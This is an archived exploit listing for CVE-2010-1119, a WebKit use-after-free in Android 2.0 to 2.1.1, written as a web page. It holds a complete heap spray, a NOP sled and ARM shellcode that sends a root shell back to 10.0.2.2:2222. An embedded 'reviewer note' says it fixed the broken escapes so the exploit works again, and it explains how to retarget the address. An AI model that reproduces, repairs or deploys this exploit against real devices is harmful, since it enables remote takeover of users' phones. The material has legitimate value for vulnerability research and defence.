
# Title : Android 2.0, 2.1, 2.1.1 WebKit Use-After-Free Exploit (CVE-2010-1119)
# Published : 2011-03-14
# Author : MJ Keith


			
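<html>
<!--
# Exploit Title: android exploit for 2010-1119 use after free
# Date: 2011/03/11
# Author: MJ Keith
# Software Link: http://www.android.com/
# Version: 2.0 ,2.1 , 2.1.1
# Tested on: Android
# CVE : 2010-1119

This is the exploit used in my Austin bsides presentation that returns a shell.
The slides are at http://www.slideshare.net/mjza/bsides
email: mkeith AT exploitscience.org

Reviewer note: as archived, every JavaScript "\u" escape in this listing had
been garbled to "/u" (one of them to "//u"). unescape() does nothing with
that literal slash text, so the spray strings and the shellcode were plain
ASCII and the exploit could not work. The backslashes are restored below;
the trigger sequence, spray sizes and shellcode words are otherwise
unchanged. The payload connects back to 10.0.2.2:2222 (which is normally
the host machine as seen from the Android emulator), so change the two
marked words before pointing it anywhere else.
-->
<head>
<script language="JavaScript">
// Trigger for CVE-2010-1119, a use-after-free on the child of an attribute
// node in Android 2.x WebKit.
//
// Flow: take the "id" attribute node of <p id=target>, detach the element,
// remove the attribute's text child while keeping a JS reference to it in
// `nodes`, spray the heap with 16-bit strings so the freed block is reused,
// then touch the dangling child so WebKit dereferences sprayed data.
function heap() {
    var id = document.getElementById("target");
    var attribute = id.getAttributeNode('id');
    // Deliberately a global (no var): the timer callback below reaches the
    // freed child through this reference.
    nodes = attribute.childNodes;
    document.body.removeChild(id);
    // The text child is freed here; nodes[0] still refers to it.
    attribute.removeChild(nodes[0]);

    // The spray runs on a separate timer tick, after the free above.
    setTimeout(function() {
        // Allocator churn: the String objects are never used, the loop
        // exists only to shape the heap before the spray.
        for (var i = 0; i < 70000; i++) {
            var s = new String(unescape("\u0058\u0058"));
        };
        // Filler for the first part of the spray.
        var scode = unescape("\u0060\u0060");
        // Filler for the second part of the spray; each 16-bit pair is the
        // ARM word 0xe1a05005 (mov r5, r5), i.e. a NOP sled in front of the
        // shellcode appended below.
        var scode2 = unescape("\u5005\ue1a0");
        // ARM EABI connect-back shellcode, little-endian 16-bit units:
        // socket() and connect() (syscall numbers built as 0x8c+0x8d and
        // 0x8d+0x8e), dup2() of the socket onto fds 0-2, a bx into Thumb
        // mode, setuid(0), then execve("//system/bin/sh"). The trailing
        // \u2000 words are padding and the final \u0002 is the start of the
        // sockaddr_in (AF_INET) completed by the three appends that follow.
        // One escape was garbled as "//u708e" in the archived copy and is
        // restored as \u708e here (add r7, r7, #0x8e -> connect); verify
        // against the original if in doubt.
        var shell = unescape("\u0002\ue3a0\u1001\ue3a0\u2005\ue281\u708c\ue3a0\u708d\ue287\u0080\uef00\u6000\ue1a0\u1084\ue28f\u2010\ue3a0\u708d\ue3a0\u708e\ue287\u0080\uef00\u0006\ue1a0\u1000\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1001\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1002\ue3a0\u703f\ue3a0\u0080\uef00\u2001\ue28f\uff12\ue12f\u4040\u2717\udf80\ua005\ua508\u4076\u602e\u1b6d\ub420\ub401\u4669\u4052\u270b\udf80\u2f2f\u732f\u7379\u6574\u2f6d\u6962\u2f6e\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002");
        shell += unescape("\uae08"); // Port = 2222 (network byte order)
        shell += unescape("\u000a\u0202"); // IP = 10.0.2.2
        shell += unescape("\u2000\u2000"); // string terminate

        // Double both fillers until they exceed 0x1000 code units, then hang
        // the shellcode off the end of the NOP-sled filler.
        do {
            scode += scode;
            scode2 += scode2;
        } while (scode.length <= 0x1000);
        scode2 += shell;

        // Spray: slots 0-129 get plain filler, 131-299 get sled+shellcode.
        // Slot 130 matches neither branch and stays undefined, so that
        // iteration writes the text "undefined"; kept as in the original
        // because the layout is what the trigger was tuned against.
        target = new Array();
        for (i = 0; i < 300; i++) {
            if (i < 130) { target[i] = scode; }
            if (i > 130) { target[i] = scode2; }
            document.write(target[i]);
            document.write("<br />");
            if (i > 250) {
                // alert("freeze");
                // Use-after-free: reading the freed text node once the
                // spray is in place makes WebKit read sprayed memory.
                nodes[0].textContent
            }
        }
    }, 0);
}
</script>
</head>
<body onload=heap()><p id=target></p></body>
</html>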